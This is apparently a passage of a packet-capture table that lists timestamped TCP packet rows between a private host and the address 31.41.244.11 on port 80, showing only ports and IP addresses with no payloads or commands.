Sep 6, 2024 09:58:06.305779934 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305794954 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305805922 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305818081 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305818081 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305829048 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305840015 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305840969 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305851936 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305862904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305871010 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305876970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305912971 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305912971 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305926085 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305942059 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305955887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.305960894 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.305986881 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306036949 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306049109 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306061983 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306077003 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306085110 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306098938 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306164026 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306189060 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306200981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306215048 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306227922 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306241989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306262970 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306262970 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306276083 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306277990 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306301117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306312084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306324959 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306335926 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306338072 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306353092 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306359053 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306365013 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306371927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306380987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306380987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306396961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306406021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306407928 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306418896 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306430101 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306432962 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306442022 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306453943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306461096 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306467056 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306479931 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306488037 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306494951 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306503057 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306515932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306531906 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306536913 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306554079 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306566000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306577921 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306595087 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306603909 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306607962 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306622028 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306632996 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306641102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306646109 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306653023 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306660891 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306667089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306678057 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306679010 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306691885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306694031 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306704044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306714058 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306716919 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306735039 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306741953 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306742907 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306749105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306755066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306760073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306762934 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306766033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306771994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306790113 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306817055 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306840897 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306852102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306864977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306885004 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306885004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.306904078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.306935072 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.307238102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.307244062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.307249069 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.307255030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.307260990 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.307286024 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.307312965 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341059923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341085911 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341099024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341111898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341135025 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341135979 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341149092 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341161966 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341176033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341187954 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341201067 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341201067 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341213942 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341216087 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341228008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341242075 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341242075 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341269016 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341281891 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341303110 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341303110 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341315985 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341562033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341582060 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341593981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341598034 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341622114 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341629028 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341762066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341775894 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341788054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341801882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.341808081 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.341837883 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378037930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378055096 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378068924 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378089905 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378103971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378117085 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378118038 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378130913 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378145933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378175974 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378192902 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378577948 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378602028 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378609896 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378622055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378659964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378660917 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378675938 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378684044 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378690004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378704071 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.378714085 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378758907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.378758907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379582882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379599094 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379612923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379648924 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379678965 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379728079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379740953 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379753113 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379765987 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379779100 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379779100 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379823923 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379825115 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379863977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379885912 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379899979 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.379909039 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379924059 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.379942894 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380325079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380337954 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380352020 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380364895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380384922 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380388975 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380398989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380413055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380414963 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380425930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380434990 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380439043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380450964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380455971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380470991 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380477905 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380506992 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.380619049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380955935 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380968094 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.380980968 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381017923 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381031036 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381038904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381052017 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381064892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381077051 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381091118 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381114960 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381123066 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381128073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381140947 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381153107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381160975 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381165981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381175995 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381177902 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381191969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381200075 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381228924 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381592989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381606102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381618977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381649017 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381653070 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381663084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381675959 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381684065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381696939 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381704092 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381735086 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381824970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381860018 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381870031 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381895065 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.381962061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381973982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.381988049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382000923 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382019043 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382038116 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382093906 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382107019 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382143974 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382168055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382358074 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382370949 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382379055 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382385969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382400036 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382409096 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382424116 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382436037 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382437944 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.382462978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.382486105 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.393403053 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.393424034 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.393440008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.393466949 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.393491983 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.394995928 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395083904 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.395119905 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395133018 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395144939 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395164967 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395167112 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.395179033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395191908 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.395194054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395210028 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.395219088 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.395240068 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.395262003 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.413927078 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.413947105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.413960934 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414073944 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.414144039 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414156914 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414166927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414187908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414201021 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414215088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414225101 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.414246082 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.414266109 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.414426088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.414468050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432188034 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432275057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432290077 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432305098 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432313919 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432317972 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432331085 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432333946 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432343006 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432356119 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432368994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432382107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432385921 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432401896 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432413101 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432418108 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432425976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432442904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432452917 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432456017 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432466984 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432503939 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432503939 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432872057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432884932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432898998 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432910919 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432920933 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432924986 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432938099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432948112 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432955027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432964087 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.432965994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.432991982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.433013916 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.468931913 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.468950033 CEST	80	49719	31.41.244.11	192.168.2.7
